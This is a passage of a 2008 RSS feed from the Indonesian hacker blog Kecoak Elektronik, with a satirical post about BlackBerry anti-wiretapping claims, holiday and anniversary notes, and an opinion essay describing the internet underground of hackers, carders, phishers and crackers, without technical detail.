			<content:encoded><![CDATA[<p>Cukup untuk membuat kita tertawa membaca <a href="http://www.detikinet.com/read/2008/09/25/163947/1012533/328/ponsel-blackberry-anti-sadap-kpk" target="_blank">berita</a> tersebut. Bapak direktur marketing ini memang sangat cerdas dan sangat memahami customer dengan baik, dengan memperhatikan pangsa pasar dimana para koruptor berkeliaran dan memahami kekuatiran mereka pasca korban kasus BLBI yang di-busted dengan metode cracking (baca: sadap) oleh pemerintah, kehadiran suatu produk yang dapat mengamankan privasi para potensial customer (baca: koruptor) tersebut akan sangat menguntungkan.</p>
<p>SMS memang sangat mudah dibaca, fresh graduate maupun anak SD yang kebetulan ikut masuk ke ruangan SMS center perusahaan telekomunikasi dapat membaca sms siapapun dari operator manapun. Pagar pengaman hanya masalah &#8216;kode etik&#8217;.</p>
<p>Seorang marketer yang baik, harus mampu melepaskan statement ambigu namun jujur. Sehingga jika ada yang complain, fakta kejujuran adalah jawaban yang tidak bisa dibantah lagi. Contoh nya: &#8220;Komunikasi bakal lebih aman karena BlackBerry memiliki teknologi enkripsi yang berbeda dengan perangkat ponsel pintar lainnya. Orang kebanyakan nyari BlackBerry karena lebih secure khususnya untuk chatting&#8221;.</p>
<p>2 minggu kemudian, salah satu potensial customer (red: cari arti potensial customer diatas) menulis pada kolom <a href="http://suarapembaca.detik.com/" target="_blank">surat pembaca</a> dari salah satu pojok ruangan KPK menyatakan bahwa klaim BlackBerry terbaru masih tidak aman. Terbukti ketika dia membicarakan suatu hal &#8216;privasi&#8217; melalui ponsel, suaranya masih dapat ditangkap oleh perangkat KPK.</p>
<p>Tidak berapa lama akan muncul balasan dari pihak exelcomindo, &#8220;Maaf pak, yang kami maksud dengan lebih secure untuk layanan data seperti pesan singkat. Pada BlackBerry sekarang terdapat mekanisme PIN khusus yang terdiri dari deretan hexadecimal untuk keperluan enkripsi, dan PIN setiap device sifatnya unik. Dengan aplikasi chatting yang memanfaatkan fasilitas PIN tersebut, maka pesan dari suatu perangkat BlackBerry ke perangkat BlackBerry lainnya yang juga mendukung fasilitas tersebut akan jauh lebih aman. Hal ini mirip seperti private/public key encryption pada SSH/SSL (red: dengan harapan sang potensial customer mengerti tentang SSH/SSL). Walaupun pesan tersebut melewati network serta BlackBerry Enterprise Server (BES) sebagai relay, namun tetap jauh lebih aman dengan mekanisme PIN ini. Sedangkan untuk komunikasi Voice masih tetap melalui jalur GSM umum.&#8221;</p>
<p>Selama komunikasi voice masih memanfaatkan BTS (2G) ataupun Node-B (3G), dan masih melewati core network suatu operator yang telah terpasang law interception technology, penyadapan masih sangat mungkin untuk dilakukan. Namun jika ternyata KPK hanya menggunakan penyadapan berbasis radio, mungkin menggunakan network 3G (UMTS/HSDPA) akan lebih aman dibandingkan menggunakan network 2G. Karena metode enkripsi 3G memang lebih baik dibandingkan 2G.</p>
<p>Well, just a joke on Sunday Morning. Reading with a cup of tea would be nice. Please not to take it too seriously ;).</p>
]]></content:encoded>
			<wfw:commentRss>http://www.kecoak-elektronik.net/log/2008/10/05/handheld-anti-sadap-kpk/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Happy Eid !</title>
		<link>http://www.kecoak-elektronik.net/log/2008/10/01/happy-eid/</link>
		<comments>http://www.kecoak-elektronik.net/log/2008/10/01/happy-eid/#comments</comments>
		<pubDate>Tue, 30 Sep 2008 18:24:33 +0000</pubDate>
		<dc:creator>Sp1d3r-73</dc:creator>
		
		<category><![CDATA[News]]></category>

		<guid isPermaLink="false">http://www.kecoak-elektronik.net/log/?p=147</guid>
		<description><![CDATA[Beberapa negara Timur Tengah dan Eropa telah melaksanakan Idul Fitri pada 30 September 2008. Sedangkan di Indonesia dan beberapa negara lain dikabarkan 1 syawal akan jatuh pada tanggal 1 Oktober 2008. Walaupun ada beberapa perbedaan disini, itu tidak menjadi masalah untuk Kecoak Elektronik Indonesia mengucapkan Selamat Hari Raya Idul Fitri 1429 H, Minal Aidzin Wal [...]]]></description>
			<content:encoded><![CDATA[<p align="justify">Beberapa negara Timur Tengah dan Eropa telah melaksanakan Idul Fitri pada 30 September 2008. Sedangkan di Indonesia dan beberapa negara lain dikabarkan 1 syawal akan jatuh pada tanggal 1 Oktober 2008. Walaupun ada beberapa perbedaan disini, itu tidak menjadi masalah untuk Kecoak Elektronik Indonesia mengucapkan <B>Selamat Hari Raya Idul Fitri 1429 H, Minal Aidzin Wal Faidzin, Mohon Maaf Lahir dan Bathin</B>, jika selama ini ada kesalahan dari kami, sekiranya kami mengucapkan maaf yang sebesar-besarnya</b></p>
]]></content:encoded>
			<wfw:commentRss>http://www.kecoak-elektronik.net/log/2008/10/01/happy-eid/feed/</wfw:commentRss>
		</item>
		<item>
		<title>&#8216;1 year&#8217; happy blogging</title>
		<link>http://www.kecoak-elektronik.net/log/2008/09/28/1-year-happy-blogging/</link>
		<comments>http://www.kecoak-elektronik.net/log/2008/09/28/1-year-happy-blogging/#comments</comments>
		<pubDate>Sun, 28 Sep 2008 00:07:01 +0000</pubDate>
		<dc:creator>staff</dc:creator>
		
		<category><![CDATA[K-Elektronik]]></category>

		<guid isPermaLink="false">http://www.kecoak-elektronik.net/log/?p=145</guid>
		<description><![CDATA[Jika dilihat pada box archive sebelah kiri, blog kecoak elektronik dimulai pada bulan september tahun 2007, dimulai dari isi blog berupa &#8216;hello folks&#8216;. Itu berarti saat ini sudah tepat 1 tahun sejak pertama kali blog dirilis. Sejak tahun lalu, ada sekitar 74 isi blog yang telah dipublish, dan cukup banyak comment yang menanggapi. Statistik pengunjungnya [...]]]></description>
			<content:encoded><![CDATA[<p>Jika dilihat pada box archive sebelah kiri, blog kecoak elektronik dimulai pada bulan september tahun 2007, dimulai dari isi blog berupa &#8216;<a href="http://www.kecoak-elektronik.net/log/2007/09/19/sub-print-hello-folks/" target="_blank">hello folks</a>&#8216;. Itu berarti saat ini sudah tepat 1 tahun sejak pertama kali blog dirilis. Sejak tahun lalu, ada sekitar 74 isi blog yang telah dipublish, dan cukup banyak comment yang menanggapi. Statistik pengunjungnya pun bertambah sedikit demi sedikit tiap bulannya. Actually, we don&#8217;t really care dengan masalah statistik, lagipula blog ini Non-SEO :). Namun tetap menyenangkan mengetahui jika isi blog ternyata bisa dibaca dan (hopefully) berguna serta bermanfaat bagi kalian semua.</p>
<p>Thanks untuk yang selama ini sudah bersedia membaca isi blog kecoak, dan juga ikut memberikan beberapa komentar. Semoga saja untuk selanjutnya kami dari kecoak elektronik dapat terus memberikan kontribusi isi blog yang jauh lebih bermanfaat.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.kecoak-elektronik.net/log/2008/09/28/1-year-happy-blogging/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Underground dan Daun Kelor</title>
		<link>http://www.kecoak-elektronik.net/log/2008/09/28/underground-dan-daun-kelor/</link>
		<comments>http://www.kecoak-elektronik.net/log/2008/09/28/underground-dan-daun-kelor/#comments</comments>
		<pubDate>Sat, 27 Sep 2008 23:36:05 +0000</pubDate>
		<dc:creator>staff</dc:creator>
		
		<category><![CDATA[Underground]]></category>

		<guid isPermaLink="false">http://www.kecoak-elektronik.net/log/?p=140</guid>
		<description><![CDATA[Adakah hubungan antara keduanya?! I don&#8217;t think so.
Namun dua istilah diatas akan berhubungan jika dimasukan dalam suatu kalimat perumpamaan yang arti sebenarnya cukup populer ditelinga orang Indonesia, &#8220;Underground tidak seluas daun kelor&#8221;.
Internet underground cenderung identik dengan aktivitas yang berhubungan dengan internet security seperti breaking server, defacing, credential stolen, backdooring, dsb. Sehingga tidak salah jika banyak [...]]]></description>
			<content:encoded><![CDATA[<p>Adakah hubungan antara keduanya?! I don&#8217;t think so.</p>
<p>Namun dua istilah diatas akan berhubungan jika dimasukan dalam suatu kalimat perumpamaan yang arti sebenarnya cukup populer ditelinga orang Indonesia, &#8220;Underground tidak seluas daun kelor&#8221;.</p>
<p>Internet underground cenderung identik dengan aktivitas yang berhubungan dengan internet security seperti breaking server, defacing, credential stolen, backdooring, dsb. Sehingga tidak salah jika banyak maniac security di internet mengklaim underground adalah dunia mereka, dan setiap penghuninya diharuskan mengikuti aturan yang berlaku di-underground. Jika di dunia vendor dan close source ada istilah NDA (Non Disclosure Agreement) maka di underground mungkin ada istilah NDE (Non Disclosure Exploit). Masyarakat internet security berpendapat bahwa underground spirit harus dimiliki oleh setiap individu yang berkecimpung dalam internet security underground, jika mereka memiliki 0day technique atau 0day exploit maka sangat diharamkan untuk membukanya kepada publik. Jika ada yang melanggar, maka akan segera dikatakan merusak underground spirit dan tidak dapat dikategorikan sebagai masyarakat underground.</p>
<p>Really?! well&#8230;we can&#8217;t say it&#8217;s wrong.</p>
<p>Memang benar masyarakat internet security merupakan bagian dari dunia internet underground, arti mudahnya mereka melakukan berbagai aktivitas dengan menggunakan identitas yang tidak diketahui oleh publik. Hanya saja jika dipikirkan lebih tenang lagi maka dunia internet underground bukan milik para hacker-hacker security saja.</p>
<p>Dilihat dari arti katanya maka dunia underground adalah dunia bawah tanah, dan jika ditanya aktivitas internet seperti apa saja yang termasuk dalam kategori dunia underground maka jawabannya adalah &#8216;banyak&#8217;. Dan memang benar, sesuai dengan prinsip underground maka para penghuninya pun menggunakan identitas yang tidak ingin diketahui oleh banyak orang serta cenderung tertutup, at least hanya terbuka bagi sebagian orang. Bahkan beberapa tetap menjaga identitasnya walaupun terhadap teman satu kelompoknya.</p>
<p>Berbagai macam alasan individu untuk menikmati dunia underground. Ada yang berbagi dan melakukan aktivitas di dunia underground sebagai suatu metode mengamankan dirinya untuk tetap dapat share pengetahuan yang didapatkan dari dunia industri, kita tahu bahwa dunia industri umumnya bersifat close source namun banyak individu yang menikmati kehidupan internet underground untuk berkolaborasi dengan individu lain dan mengerjakan suatu project yang menyenangkan bagi mereka, namun menggunakan pengetahuan yang mereka dapatkan dari pekerjaan profesional masing-masing.</p>
<p>Ada sekelompok programmer yang bekerja pada perusahaan pembuat software komersial namun saling berkolaborasi mengerjakan project opensource, seperti OpenGL, GTK, QT, dan berbagai macam teknologi opensource yang mampu menyamai teknologi close-source. Ada individu yang bekerja pada perusahaan komersial seperti CISCO, IBM, Apple, bahkan GOOGLE namun masih tetap berkontribusi pada dunia internet underground untuk menghasilkan berbagai project-project opensource ataupun sekedar bersenang-senang bersama individu dari negara lain untuk keluar masuk server dan menuliskan nya dalam bentuk ezine (salah satu jagoan python di GOOGLE corp. masih terus hobi bermain dalam kelompok underground dan merilis ezine yang termasuk populer).</p>
<p>Penghuni underground lainnya seperti cracker yang sering membuat keygen untuk software-software komersial. Beberapa waktu yang lalu CyberTank sempat memberitahu beberapa individu Indonesia dengan kemampuan reverse engineering luar biasa dan terbiasa membuat keygen/crack yang mungkin selama ini kita gunakan dan tersebar diberbagai forum-forum. Mereka juga memiliki pekerjaan masing-masing, ataupun mungkin masih berstatus anak sekolah, namun juga tetap menggunakan identitas tersendiri untuk melakukan aktivitas tersebut di Underground. Dan tidak bisa dipungkiri mereka juga termasuk para aktivis underground.</p>
<p>Contoh penghuni underground lainnya adalah para carder di Indonesia. Banyak yang mengatakan bahwa sangat sulit untuk mengirim barang dari luar negeri ke Indonesia karena negara Indonesia termasuk dalam daftar blacklist. Namun masih tetap banyak carder-carder Indonesia yang berhasil memasukan barang-barang tersebut dengan berbagai macam metode, dan tentu saja mereka tetap menjaga identitas untuk tidak diketahui oleh publik (polisi?!). Dan tidak bisa dipungkiri juga bahwa mereka termasuk para aktivis internet underground.</p>
<p>Bagaimana dengan phisser?! walaupun tampak sepele, namun perubahan tingkah laku para defacer Indonesia untuk memanfaatkan phissing terhadap hasil jarahannya sudah cukup lumayan. Kita bisa melihat di milis ID-CERT yang &#8216;kosong&#8217; namun tetap ramai dengan notifikasi dari berbagai perusahaan seperti paypal bahwa situs-situs Indonesia digunakan untuk kepentingan phissing. Dan mungkin cukup banyak pihak yang dirugikan dengan hasil phissing ini. Dan tentu saja mereka juga memiliki 0day technique untuk masalah phissing tersebut. Underground?! sure.</p>
<p>Worm/Trojan/Virus writer?! un-questionable. Di Indonesia ada banyak komunitas ini dan banyak juga yang menjaga identitas mereka untuk tetap underground, bahkan beberapa bisa dikatakan memiliki pekerjaan legal namun tetap berbagi metode dan menulis virus untuk sekedar hobi.</p>
<p>Phreaker juga tetap berkembang di Underground. Dengan semakin berkembangnya teknologi telekomunikasi, masih banyak didapatkan resource-resource yang menjelaskan tentang teknologi telekomunikasi padahal notabene merupakan produk industri closed source dan sulit untuk ditemukan referensinya. Namun beberapa individu tetap saling share di dunia underground mengenai teknologi ini, dan diantara hasilnya adalah hacking algoritma A3/A5 yang digunakan untuk authentifikasi dengan mesin HLR serta baseband hacking untuk iPhone.</p>
<p>Di Indonesia sendiri komunitas internet security masih termasuk yang paling keras gaungnya untuk menyarakan kata &#8216;underground&#8217; sehingga banyak komunitas lain yang terlewatkan untuk juga dikategorikan sebagai komunitas underground. IMHO, aktivitas underground di Indonesia masih terus berkembang dan sangat menarik. Walaupun disetiap bidang underground mereka cenderung menutup diri (misal: para carder, karena jika tehnik carding mereka diketahui publik maka akan banyak merugikan para carder lainnya), namun akan sangat menyenangkan jika ada beberapa pihak yang bersedia membagikan sedikit ilmu nya (tentu saja dengan identitas yang berbeda <img src='http://www.kecoak-elektronik.net/log/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> ) kepada publik, sehingga jika ada acara seminar ataupun konferensi yang dibicarakan bukan hanya seputar IT security berbau eksploitasi, wireless, backdooring, dsb. Dengan adanya informasi tehnik carding ini bisa juga bermanfaat bagi masyarakat awam lainnya untuk lebih berhati-hati.</p>
<p>Ataupun juga jika para cracker/pembuat keygen dapat memberikan sedikit tehnik mereka, mungkin dapat membantu para programmer untuk melindungi hasil software buatan mereka. Dan bagi para keygen-er tentu saja akan mendapatkan tantangan baru jika para programmer semakin pintar melindungi software mereka. Bukankah itu salah satu kenikmatan melakukan reverse engineering?! :).</p>
<p>Komunitas IT security di Indonesia umumnya berasal dari underground yang kemudian muncul ke &#8216;dunia nyata&#8217; untuk berbagi informasi mengenai teknologi IT &amp; Security. Namun dapat diyakini beberapa individu pada komunitas tersebut tetap melakukan aktivitas underground dengan menggunakan identitas lain yang tidak dikenal (tentu saja, jika menggunakan identitas yang telah dikenal berarti bukan underground bukan?!). Dan dapat diyakini juga metode 0day baru yang mereka temukan di underground tidak akan langsung dibagikan kepada publik begitu saja, mungkin setelah puas bermain dengan metode baru tersebut barulah dibagikan kepada publik, dan itu balik lagi ke individunya masing-masing :).</p>
<p>Apakah salah jika komunitas security merasa bahwa dunia mereka adalah bagian dari internet underground?! no. Apakah salah jika para profesional tetap berkecimpung dalam dunia internet underground untuk sekedar memuaskan hobi mereka selepas hari-hari melelahkan akibat pekerjaan sehari-hari?! no. Apakah salah jika para penghuni underground dari berbagai bidang tersebut ingin saling berbagi experience dan bertemu (kopdar) serta berinteraksi dengan para individu dari bidang lain di dunia nyata namun tanpa merusak identitas mereka di dunia internet underground?! no.</p>
<p>Whatever people said, internet underground still an awesome world. Tempat bertemu dan bersosialisasi dengan beragam individu dari seluruh dunia yang memiliki hobi sama dengan kita. Dan yang pasti, tempat dimana kita bisa memuaskan hobi utak-atik tanpa perlu terbebani dengan aturan NDA dan propriatary policy.</p>
<p>So, what&#8217;s underground now?! <img src='http://www.kecoak-elektronik.net/log/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p>PS: Pada event idsecconf mendatang diharapkan kalian para penghuni internet underground indonesia (yes! underground) dapat ikut berpartisipasi, topik yang diharapkan untuk dibicarakan pada event tersebut bukan hanya seputar IT security. Diharapkan individu-individu / komunitas underground dapat ikut berbagi informasi walaupun sedikit. Dengan metode penggunaan identitas nick pada event tersebut maka seharusnya tidak ada masalah dengan privasi sebenarnya di Underground.</p>
<p>CFP already realesed now, can&#8217;t wait to see your technique to be presented there guys!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.kecoak-elektronik.net/log/2008/09/28/underground-dan-daun-kelor/feed/</wfw:commentRss>
		</item>
	</channel>
</rss>
